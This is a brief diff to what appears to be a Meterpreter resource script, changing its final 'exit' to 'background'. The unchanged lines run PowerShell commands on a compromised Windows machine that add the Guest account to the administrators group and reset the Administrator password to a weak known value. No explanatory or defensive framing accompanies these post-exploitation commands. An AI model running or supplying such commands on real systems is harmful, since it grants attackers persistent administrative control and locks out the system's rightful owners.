--- a/commands.rc
+++ b/commands.rc
@@ -1,6 +1,6 @@
 load powershell
 powershell_execute "net localgroup administrators Guest /add"
 powershell_execute "net user Administrator Passw0rd"
-exit
+background
 
 
